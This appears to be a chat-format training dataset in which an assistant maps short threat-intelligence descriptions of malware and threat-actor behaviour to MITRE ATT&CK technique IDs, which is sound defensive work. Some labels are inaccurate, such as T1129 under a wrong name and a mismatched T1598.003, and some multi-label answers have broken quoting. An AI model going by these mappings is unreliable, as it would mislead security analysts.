- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine. The actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can use Python scripts to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"net accounts\" and \"net accounts /domain\" commands with Net can be used to obtain password policy information."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to plainpwd and CredRaptor the toolkit includes a keylogger. The keylogger uses a standard technique to capture keystrokes, specifically the SetWindowsHookEx function"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare can obtain a list of running processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In many payment card data breaches, a point-of-sale (POS) system is infected with malware that searches for specific processes in memory known to store card data in plain text"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can install itself as a new service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to download files on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands \"systeminfo\", \"net config workstation\", \"hostname\", \"ver\", \"set\", and \"date /t\"."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can run the ShellExecuteW API via the Windows Command Shell."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig has the ability to use HTTPS for C2 communiations."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TRITON was run as trilog.exe, a Py2EXE compiled python script that accepts a single IP address as a flag."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowGoop can receive encrypted commands from C2."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker may attempt to connect to removable drives and mapped network drives."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Embedded Trojan This Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and execute a secondary payload, as well as downloading and opening a decoy document. Upon execution, this Trojan checks to see if it was configured with \"BINDERON\" to determine if it should extract an embedded payload from a resource named \"B\", save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload. While the Trojan was configured to carry out this activity, the actor did not embed a payload within the \"B\" resource, so this functionality does not carry out any activities, rather it just causes an exception and continues running. Another configuration option encountered by this Trojan is a check for '%STARTUPON%'. This sample was not configured to execute with this option enabled, however, should this option be enabled, the Trojan would attempt to install itself to the system at a specific location by writing its contents in base64-encoded format to the following file"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors encrypted IP addresses used for \"Agent\" proxy hops with RC4."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can dump credentials from the macOS keychain."
- },
- {
- "role": "assistant",
- "content": "T1555.001 - Credentials from Password Stores: Keychain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia collects the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the command prompt to execute commands on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has used `.vbs` scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can use PowerShell to add files to the Windows Defender exclusions list."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When users run the malicious CHM file, the HTM file’s code is executed. The script decompiles the CHM file through hh.exe and runs LBTWiz32.exe. It then creates a normal image file (KBSI_SNS_003.jpg) on the PC screen, making it difficult for users to recognize malicious behaviors."
- },
- {
- "role": "assistant",
- "content": "T1218 - Signed Binary Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike. Use scheduled tasks and batch files for automation. The use of LOLBins. Erasing Windows Event Logs, files and tasks"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack contains a function that calls \"LoadLibrary\" and \"GetProcAddress\"."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The cab file was encrypted and decrypted using a simple xor cipher with a rotating 16 byte key: \\x36\\x11\\xdd\\x08\\xac\\x4b\\x72\\xf8\\x51\\x04\\x68\\x2e\\x3e\\x38\\x64\\x32"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar has used PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has the ability to write collected data to a file created in the \"./LOGS\" directory."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Even though Delphi Cannon uses POP3S and SMTPS for its C2 communications like Cannon, it is arguably easier to defend against as it uses an actor owned domain that defenders can easily block and not a legitimate email provider such as Seznam"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team checks for connectivity to other resources in the network."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although, the use of target names with actuating themes is not new to this group, there has been a significant uptick in the number of emails received and this campaign has been persistently active for the past few weeks"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT gathers information about opened windows during the initial infection."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 15: Structure used to send data to server Figure 16: Structure used to send data to C2 server The structure is converted to Base64 using the CryptBinaryToStringA function"
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get2 has the ability to use HTTP to send information collected from an infected host to C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Traffic traversing the Tor network will be forwarded to multiple nodes before exiting the Tor network and continuing on to its intended destination."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has the ability to modify its process memory to hide process command-line arguments."
- },
- {
- "role": "assistant",
- "content": "T1564.010 - Process Argument Spoofing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has distributed targeted emails containing links to malicious documents with embedded macros."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 created accounts disguised as legitimate backup and service accounts as well as an email administration account."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has installed a new Windows service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used Putty Secure Copy Client (PSCP) to transfer data."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ran a command to compile an archive of file types of interest from the victim user's directories."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has collected credentials from infected systems, including domain accounts."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AdFind can enumerate domain users."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "network traffic can communicate over a raw socket."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs can obtain information on installed anti-malware programs."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "netstat can be used to enumerate local network connections, including active TCP connections and other network statistics."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DownPaper collects the victim username and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta hb.exe 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 Hobocopy nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 tardigrade.exe fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392 Tardigrade application"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has detached network shares after exfiltrating files, likely to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink can use DNS over HTTPS (DoH) to resolve C2 nodes."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer has set the run key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter leverages LDAP and SMB protocol to discover all hosts in the AD."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic collects the user name from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use HTTP or DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has used a .NET tool named dog.exe to exiltrate information over an e-mail account."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mivast creates the following Registry entry: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more"
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data', 'T1070.004 - Indicator Removal on Host: File Deletion', 'T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel can download additional modules from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has decrypted an AES encrypted binary file to trigger the download of other files."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to use JavaScript to execute PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware."
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
